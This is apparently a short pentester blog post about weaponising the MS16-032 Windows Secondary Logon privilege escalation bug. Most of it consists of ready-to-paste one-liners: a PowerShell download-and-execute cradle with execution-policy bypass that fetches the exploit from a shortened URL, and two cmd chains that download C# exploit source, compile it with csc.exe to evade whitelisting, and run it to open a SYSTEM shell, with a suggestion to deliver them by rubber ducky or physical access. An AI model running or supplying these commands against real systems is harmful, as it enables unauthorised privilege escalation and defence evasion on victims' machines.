I was playing around with box in my lab earlier testing out ms16-032, which is a privilege escalation exploit that got patched earlier this year that affected windows versions vista,2k8,7,8.1,2k12, and 10. It was a bug in the Secondary Logon service that allows you to leak a handle opened in a privileged process into a lower privileged process. @FuzzySec made a powershell script to exploit this that works really well, but I wanted to make it into as easy 1-liner to paste into a cmd prompt.
powershell -ExecutionPolicy Bypass "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/wrlBsL'); Invoke-ms16-032"
I also came across @fdiskyou’s github in which he converted the powershell script into C# to help bypass whitelisting etc. The hardest part was trying to figure out where System.Management.Automation.dll was on the target because its a different location for every Windows version, so I found that I could just use the ([PSObject].Assembly.Location)
powershell variable and copy the .dll to the %temp% folder.
I made 2 different versions because the i didn’t feel like figuring out passing the variables to determine x32 vs. x64 for csc.exe to compile.
C# 64bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X64.exe" /platform:x64 "%temp%\ms16-032.cs" && %temp%\ms16-032_X64.exe
C# 32bit:
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://goo.gl/uA7Uvx','%temp%\ms16-032.cs'); && powershell copy ([PSObject].Assembly.Location) %temp% && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:%temp%\System.Management.Automation.dll /reference:System.IO.Compression.dll /out:"%temp%\ms16-032_X32.exe" /platform:x32 "%temp%\ms16-032.cs" && %temp%\ms16-032_X32.exe
Pasting these into a cmd prompt on a vulnerable machine should pop you a new cmd prompt as ‘nt authority\system’. This was just an exercise to learn how to make simple 1 liners for use on pentests, one could use this along with say a rubber ducky or physical access to the machine to elevate their privs quickly.